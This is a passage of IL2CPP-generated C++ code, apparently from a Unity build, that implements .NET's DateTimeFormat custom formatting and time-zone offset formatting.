L_123 = V_1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_124 = ___dtfi2; String_t* L_125 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_124, /*hidden argument*/NULL); Il2CppChar L_126 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_125, 0, /*hidden argument*/NULL); StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_123, L_126, /*hidden argument*/NULL); goto IL_05cc; } IL_031a: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_127 = ___dtfi2; String_t* L_128 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_127, /*hidden argument*/NULL); int32_t L_129 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_128, /*hidden argument*/NULL); if ((((int32_t)L_129) < ((int32_t)1))) { goto IL_05cc; } } { StringBuilder_t * L_130 = V_1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_131 = ___dtfi2; String_t* L_132 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_131, /*hidden argument*/NULL); Il2CppChar L_133 = String_get_Chars_m14308AC3B95F8C1D9F1D1055B116B37D595F1D96(L_132, 0, /*hidden argument*/NULL); StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_130, L_133, /*hidden argument*/NULL); goto IL_05cc; } IL_0343: { StringBuilder_t * L_134 = V_1; int32_t L_135 = DateTime_get_Hour_mAE590743ACB6951BD0C4521634B698AE34EC08B3((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); G_B59_0 = L_134; if ((((int32_t)L_135) < ((int32_t)((int32_t)12)))) { G_B60_0 = L_134; goto IL_0357; } } { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_136 = ___dtfi2; String_t* L_137 = DateTimeFormatInfo_get_PMDesignator_m9B249FB528D588F5B6AEFA088CEF342DEDF8594D(L_136, /*hidden argument*/NULL); G_B61_0 = L_137; G_B61_1 = G_B59_0; goto IL_035d; } IL_0357: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_138 = ___dtfi2; String_t* L_139 = DateTimeFormatInfo_get_AMDesignator_m3F6101B15CF9711362B92B7827F29BC8589EEC13(L_138, /*hidden argument*/NULL); G_B61_0 = L_139; G_B61_1 = G_B60_0; } IL_035d: { StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(G_B61_1, G_B61_0, /*hidden argument*/NULL); goto IL_05cc; } IL_0368: { String_t* L_140 = ___format1; int32_t L_141 = V_4; Il2CppChar L_142 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_143 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_140, L_141, L_142, /*hidden argument*/NULL); V_5 = L_143; int32_t L_144 = V_5; if ((((int32_t)L_144) > ((int32_t)2))) { goto IL_039b; } } { Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_145 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_146 = ___dateTime0; int32_t L_147 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(11 /* System.Int32 System.Globalization.Calendar::GetDayOfMonth(System.DateTime) */, L_145, L_146); V_15 = L_147; bool L_148 = V_2; if (!L_148) { goto IL_038f; } } { StringBuilder_t * L_149 = V_1; int32_t L_150 = V_15; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_HebrewFormatDigits_m89657AAA5FF4AC8C0E6D490BA0DD98DF2F92AEBC(L_149, L_150, /*hidden argument*/NULL); goto IL_03b5; } IL_038f: { StringBuilder_t * L_151 = V_1; int32_t L_152 = V_15; int32_t L_153 = V_5; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(L_151, L_152, L_153, /*hidden argument*/NULL); goto IL_03b5; } IL_039b: { Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_154 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_155 = ___dateTime0; int32_t L_156 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(12 /* System.DayOfWeek System.Globalization.Calendar::GetDayOfWeek(System.DateTime) */, L_154, L_155); V_16 = L_156; StringBuilder_t * L_157 = V_1; int32_t L_158 = V_16; int32_t L_159 = V_5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_160 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_161 = DateTimeFormat_FormatDayOfWeek_m3F0892B000EBE522857AD1EE8676FEBBED8A21F9(L_158, L_159, L_160, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_157, L_161, /*hidden argument*/NULL); } IL_03b5: { V_3 = (bool)0; goto IL_05cc; } IL_03bc: { String_t* L_162 = ___format1; int32_t L_163 = V_4; Il2CppChar L_164 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_165 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_162, L_163, L_164, /*hidden argument*/NULL); V_5 = L_165; Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_166 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_167 = ___dateTime0; int32_t L_168 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(16 /* System.Int32 System.Globalization.Calendar::GetMonth(System.DateTime) */, L_166, L_167); V_9 = L_168; int32_t L_169 = V_5; if ((((int32_t)L_169) > ((int32_t)2))) { goto IL_03ef; } } { bool L_170 = V_2; if (!L_170) { goto IL_03e3; } } { StringBuilder_t * L_171 = V_1; int32_t L_172 = V_9; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_HebrewFormatDigits_m89657AAA5FF4AC8C0E6D490BA0DD98DF2F92AEBC(L_171, L_172, /*hidden argument*/NULL); goto IL_044a; } IL_03e3: { StringBuilder_t * L_173 = V_1; int32_t L_174 = V_9; int32_t L_175 = V_5; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(L_173, L_174, L_175, /*hidden argument*/NULL); goto IL_044a; } IL_03ef: { bool L_176 = V_2; if (!L_176) { goto IL_0406; } } { StringBuilder_t * L_177 = V_1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_178 = ___dateTime0; int32_t L_179 = V_9; int32_t L_180 = V_5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_181 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_182 = DateTimeFormat_FormatHebrewMonthName_m95BC9040E14EDDE6DF41A71A93F9D7D1878661E6(L_178, L_179, L_180, L_181, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_177, L_182, /*hidden argument*/NULL); goto IL_044a; } IL_0406: { DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_183 = ___dtfi2; int32_t L_184 = DateTimeFormatInfo_get_FormatFlags_m42B106A8C2AC470D425032034608045AABB71731(L_183, /*hidden argument*/NULL); if (!((int32_t)((int32_t)L_184&(int32_t)1))) { goto IL_0439; } } { int32_t L_185 = V_5; if ((((int32_t)L_185) < ((int32_t)4))) { goto IL_0439; } } { StringBuilder_t * L_186 = V_1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_187 = ___dtfi2; int32_t L_188 = V_9; String_t* L_189 = ___format1; int32_t L_190 = V_4; int32_t L_191 = V_5; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); bool L_192 = DateTimeFormat_IsUseGenitiveForm_mC6899D681D480B53806BD3AF1ED729552991AA66(L_189, L_190, L_191, ((int32_t)100), /*hidden argument*/NULL); G_B77_0 = L_188; G_B77_1 = L_187; G_B77_2 = L_186; if (L_192) { G_B78_0 = L_188; G_B78_1 = L_187; G_B78_2 = L_186; goto IL_042a; } } { G_B79_0 = 0; G_B79_1 = G_B77_0; G_B79_2 = G_B77_1; G_B79_3 = G_B77_2; goto IL_042b; } IL_042a: { G_B79_0 = 1; G_B79_1 = G_B78_0; G_B79_2 = G_B78_1; G_B79_3 = G_B78_2; } IL_042b: { String_t* L_193 = DateTimeFormatInfo_internalGetMonthName_mE9361985B13F655CED883CDDF45DC962EE2F1F77(G_B79_2, G_B79_1, G_B79_0, (bool)0, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(G_B79_3, L_193, /*hidden argument*/NULL); goto IL_044a; } IL_0439: { StringBuilder_t * L_194 = V_1; int32_t L_195 = V_9; int32_t L_196 = V_5; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_197 = ___dtfi2; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_198 = DateTimeFormat_FormatMonth_mA46FA8711C67F699CA3571582725FA8CB226757F(L_195, L_196, L_197, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_194, L_198, /*hidden argument*/NULL); } IL_044a: { V_3 = (bool)0; goto IL_05cc; } IL_0451: { Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_199 = V_0; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_200 = ___dateTime0; int32_t L_201 = VirtFuncInvoker1< int32_t, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 >::Invoke(18 /* System.Int32 System.Globalization.Calendar::GetYear(System.DateTime) */, L_199, L_200); V_10 = L_201; String_t* L_202 = ___format1; int32_t L_203 = V_4; Il2CppChar L_204 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_205 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_202, L_203, L_204, /*hidden argument*/NULL); V_5 = L_205; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_206 = ___dtfi2; bool L_207 = DateTimeFormatInfo_get_HasForceTwoDigitYears_m4CF064E8CAFE2C1DBCDAE8747137E94ACBA81A7B(L_206, /*hidden argument*/NULL); if (!L_207) { goto IL_0482; } } { StringBuilder_t * L_208 = V_1; int32_t L_209 = V_10; int32_t L_210 = V_5; G_B84_0 = L_209; G_B84_1 = L_208; if ((((int32_t)L_210) <= ((int32_t)2))) { G_B85_0 = L_209; G_B85_1 = L_208; goto IL_0479; } } { G_B86_0 = 2; G_B86_1 = G_B84_0; G_B86_2 = G_B84_1; goto IL_047b; } IL_0479: { int32_t L_211 = V_5; G_B86_0 = L_211; G_B86_1 = G_B85_0; G_B86_2 = G_B85_1; } IL_047b: { IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(G_B86_2, G_B86_1, G_B86_0, /*hidden argument*/NULL); goto IL_04d1; } IL_0482: { Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * L_212 = V_0; int32_t L_213 = VirtFuncInvoker0< int32_t >::Invoke(7 /* System.Int32 System.Globalization.Calendar::get_ID() */, L_212); if ((!(((uint32_t)L_213) == ((uint32_t)8)))) { goto IL_0495; } } { StringBuilder_t * L_214 = V_1; int32_t L_215 = V_10; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_HebrewFormatDigits_m89657AAA5FF4AC8C0E6D490BA0DD98DF2F92AEBC(L_214, L_215, /*hidden argument*/NULL); goto IL_04d1; } IL_0495: { int32_t L_216 = V_5; if ((((int32_t)L_216) > ((int32_t)2))) { goto IL_04a9; } } { StringBuilder_t * L_217 = V_1; int32_t L_218 = V_10; int32_t L_219 = V_5; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53(L_217, ((int32_t)((int32_t)L_218%(int32_t)((int32_t)100))), L_219, /*hidden argument*/NULL); goto IL_04d1; } IL_04a9: { int32_t L_220 = V_5; int32_t L_221 = L_220; RuntimeObject * L_222 = Box(Int32_t585191389E07734F19F3156FF88FB3EF4800D102_il2cpp_TypeInfo_var, &L_221); String_t* L_223 = String_Concat_mBB19C73816BDD1C3519F248E1ADC8E11A6FDB495(_stringLiteral50C9E8D5FC98727B4BBC93CF5D64A68DB647F04F, L_222, /*hidden argument*/NULL); V_17 = L_223; StringBuilder_t * L_224 = V_1; String_t* L_225 = V_17; IL2CPP_RUNTIME_CLASS_INIT(CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_il2cpp_TypeInfo_var); CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F * L_226 = CultureInfo_get_InvariantCulture_mF13B47F8A763CE6A9C8A8BB2EED33FF8F7A63A72(/*hidden argument*/NULL); String_t* L_227 = Int32_ToString_mE527694B0C55AE14FDCBE1D9C848446C18E22C09((int32_t*)(&V_10), L_225, L_226, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_224, L_227, /*hidden argument*/NULL); } IL_04d1: { V_3 = (bool)0; goto IL_05cc; } IL_04d8: { String_t* L_228 = ___format1; int32_t L_229 = V_4; Il2CppChar L_230 = V_7; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_231 = DateTimeFormat_ParseRepeatPattern_m11E6DB962F18F4FA477D4A4E4C168AF8771D67DB(L_228, L_229, L_230, /*hidden argument*/NULL); V_5 = L_231; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_232 = ___dateTime0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_233 = ___offset3; String_t* L_234 = ___format1; int32_t L_235 = V_5; bool L_236 = V_3; StringBuilder_t * L_237 = V_1; DateTimeFormat_FormatCustomizedTimeZone_m31043AD6F2795436AB56520F2689E3E0DDA5C685(L_232, L_233, L_234, L_235, L_236, L_237, /*hidden argument*/NULL); goto IL_05cc; } IL_04f5: { V_5 = 1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_238 = ___dateTime0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_239 = ___offset3; StringBuilder_t * L_240 = V_1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_FormatCustomizedRoundripTimeZone_mDCF0536EFD8B9E6DD2E794237D72D9C939099AC7(L_238, L_239, L_240, /*hidden argument*/NULL); goto IL_05cc; } IL_0505: { StringBuilder_t * L_241 = V_1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_242 = ___dtfi2; String_t* L_243 = DateTimeFormatInfo_get_TimeSeparator_m9D230E9D88CE3E2EBA24365775D2B4B2D5621C58(L_242, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_241, L_243, /*hidden argument*/NULL); V_5 = 1; goto IL_05cc; } IL_051a: { StringBuilder_t * L_244 = V_1; DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_245 = ___dtfi2; String_t* L_246 = DateTimeFormatInfo_get_DateSeparator_m68C0C4E4320F22BAA7B6E6EFF7DD7349541D509C(L_245, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_244, L_246, /*hidden argument*/NULL); V_5 = 1; goto IL_05cc; } IL_052f: { StringBuilder_t * L_247 = (StringBuilder_t *)il2cpp_codegen_object_new(StringBuilder_t_il2cpp_TypeInfo_var); StringBuilder__ctor_mF928376F82E8C8FF3C11842C562DB8CF28B2735E(L_247, /*hidden argument*/NULL); V_11 = L_247; String_t* L_248 = ___format1; int32_t L_249 = V_4; StringBuilder_t * L_250 = V_11; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_251 = DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60(L_248, L_249, L_250, /*hidden argument*/NULL); V_5 = L_251; StringBuilder_t * L_252 = V_1; StringBuilder_t * L_253 = V_11; StringBuilder_Append_mA1A063A1388A21C8EA011DBA7FC98C24C3EE3D65(L_252, L_253, /*hidden argument*/NULL); goto IL_05cc; } IL_054d: { String_t* L_254 = ___format1; int32_t L_255 = V_4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_256 = DateTimeFormat_ParseNextChar_m7A2B93C769DB2E4AE88704BFB9D06216610F8F98(L_254, L_255, /*hidden argument*/NULL); V_8 = L_256; int32_t L_257 = V_8; if ((((int32_t)L_257) < ((int32_t)0))) { goto IL_0582; } } { int32_t L_258 = V_8; if ((((int32_t)L_258) == ((int32_t)((int32_t)37)))) { goto IL_0582; } } { StringBuilder_t * L_259 = V_1; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_260 = ___dateTime0; int32_t L_261 = V_8; V_18 = (((int32_t)((uint16_t)L_261))); String_t* L_262 = Char_ToString_mA42A88FEBA41B72D48BB24373E3101B7A91B6FD8((Il2CppChar*)(&V_18), /*hidden argument*/NULL); DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * L_263 = ___dtfi2; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_264 = ___offset3; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); String_t* L_265 = DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619(L_260, L_262, L_263, L_264, /*hidden argument*/NULL); StringBuilder_Append_mDBB8CCBB7750C67BE2F2D92F47E6C0FA42793260(L_259, L_265, /*hidden argument*/NULL); V_5 = 2; goto IL_05cc; } IL_0582: { String_t* L_266 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralD2F0257C42607F2773F4B8AAB0C017A3B8949322, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_267 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_267, L_266, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_267, NULL, DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619_RuntimeMethod_var); } IL_0592: { String_t* L_268 = ___format1; int32_t L_269 = V_4; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); int32_t L_270 = DateTimeFormat_ParseNextChar_m7A2B93C769DB2E4AE88704BFB9D06216610F8F98(L_268, L_269, /*hidden argument*/NULL); V_8 = L_270; int32_t L_271 = V_8; if ((((int32_t)L_271) < ((int32_t)0))) { goto IL_05b0; } } { StringBuilder_t * L_272 = V_1; int32_t L_273 = V_8; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_272, (((int32_t)((uint16_t)L_273))), /*hidden argument*/NULL); V_5 = 2; goto IL_05cc; } IL_05b0: { String_t* L_274 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralD2F0257C42607F2773F4B8AAB0C017A3B8949322, /*hidden argument*/NULL); FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC * L_275 = (FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC *)il2cpp_codegen_object_new(FormatException_t2808E076CDE4650AF89F55FD78F49290D0EC5BDC_il2cpp_TypeInfo_var); FormatException__ctor_m89167FF9884AE20232190FE9286DC50E146A4F14(L_275, L_274, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_275, NULL, DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619_RuntimeMethod_var); } IL_05c0: { StringBuilder_t * L_276 = V_1; Il2CppChar L_277 = V_7; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_276, L_277, /*hidden argument*/NULL); V_5 = 1; } IL_05cc: { int32_t L_278 = V_4; int32_t L_279 = V_5; V_4 = ((int32_t)il2cpp_codegen_add((int32_t)L_278, (int32_t)L_279)); } IL_05d3: { int32_t L_280 = V_4; String_t* L_281 = ___format1; int32_t L_282 = String_get_Length_mD48C8A16A5CF1914F330DCE82D9BE15C3BEDD018(L_281, /*hidden argument*/NULL); if ((((int32_t)L_280) < ((int32_t)L_282))) { goto IL_0023; } } { StringBuilder_t * L_283 = V_1; String_t* L_284 = StringBuilderCache_GetStringAndRelease_mDD5B8378FE9378CACF8660EB460E0CE545F215F7(L_283, /*hidden argument*/NULL); return L_284; } } // System.Void System.DateTimeFormat::FormatCustomizedTimeZone(System.DateTime,System.TimeSpan,System.String,System.Int32,System.Boolean,System.Text.StringBuilder) extern "C" IL2CPP_METHOD_ATTR void DateTimeFormat_FormatCustomizedTimeZone_m31043AD6F2795436AB56520F2689E3E0DDA5C685 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 ___offset1, String_t* ___format2, int32_t ___tokenLen3, bool ___timeOnly4, StringBuilder_t * ___result5, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTimeFormat_FormatCustomizedTimeZone_m31043AD6F2795436AB56520F2689E3E0DDA5C685_MetadataUsageId); s_Il2CppMethodInitialized = true; } { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_0 = ___offset1; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_1 = ((DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_StaticFields*)il2cpp_codegen_static_fields_for(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var))->get_NullOffset_0(); IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); bool L_2 = TimeSpan_op_Equality_mEA0A4B7FDCAFA54C636292F7EB76F9A16C44096D(L_0, L_1, /*hidden argument*/NULL); if (!L_2) { goto IL_0060; } } { bool L_3 = ___timeOnly4; if (!L_3) { goto IL_0032; } } { int64_t L_4 = DateTime_get_Ticks_mBCB529E43D065E498EAF08971D2EB49D5CB59D60((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); if ((((int64_t)L_4) >= ((int64_t)((int64_t)864000000000LL)))) { goto IL_0032; } } { IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_5 = DateTime_get_Now_mB464D30F15C97069F92C1F910DCDDC3DFCC7F7D2(/*hidden argument*/NULL); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_6 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_5, 2, /*hidden argument*/NULL); ___offset1 = L_6; goto IL_0060; } IL_0032: { int32_t L_7 = DateTime_get_Kind_m44C21F0AB366194E0233E48B77B15EBB418892BE((DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *)(&___dateTime0), /*hidden argument*/NULL); if ((!(((uint32_t)L_7) == ((uint32_t)1)))) { goto IL_0057; } } { String_t* L_8 = ___format2; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_9 = ___dateTime0; IL2CPP_RUNTIME_CLASS_INIT(DateTimeFormat_t3C1DB338DFB9FCD0D11332F29E5FD9DD79FEE6C8_il2cpp_TypeInfo_var); DateTimeFormat_InvalidFormatForUtc_m0E9CACD473EA60B086EAD03C09488869673E109D(L_8, L_9, /*hidden argument*/NULL); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_10 = ___dateTime0; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_11 = DateTime_SpecifyKind_m2E9B2B28CB3255EA842EBCBA42AF0565144D2316(L_10, 2, /*hidden argument*/NULL); ___dateTime0 = L_11; DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_12 = ___dateTime0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_13 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_12, 2, /*hidden argument*/NULL); ___offset1 = L_13; goto IL_0060; } IL_0057: { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_14 = ___dateTime0; TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_15 = TimeZoneInfo_GetLocalUtcOffset_m1C5E0CC7CA725508F5180BDBF2D03C3E8DF0FBFC(L_14, 2, /*hidden argument*/NULL); ___offset1 = L_15; } IL_0060: { TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_16 = ___offset1; IL2CPP_RUNTIME_CLASS_INIT(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_17 = ((TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_StaticFields*)il2cpp_codegen_static_fields_for(TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4_il2cpp_TypeInfo_var))->get_Zero_0(); bool L_18 = TimeSpan_op_GreaterThanOrEqual_m7FE9830EF2AAD2BB65628A0FE7F7C70161BB4D9B(L_16, L_17, /*hidden argument*/NULL); if (!L_18) { goto IL_0079; } } { StringBuilder_t * L_19 = ___result5; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_19, ((int32_t)43), /*hidden argument*/NULL); goto IL_008c; } IL_0079: { StringBuilder_t * L_20 = ___result5; StringBuilder_Append_m05C12F58ADC2D807613A9301DF438CB3CD09B75A(L_20, ((int32_t)45), /*hidden argument*/NULL); TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 L_21 = 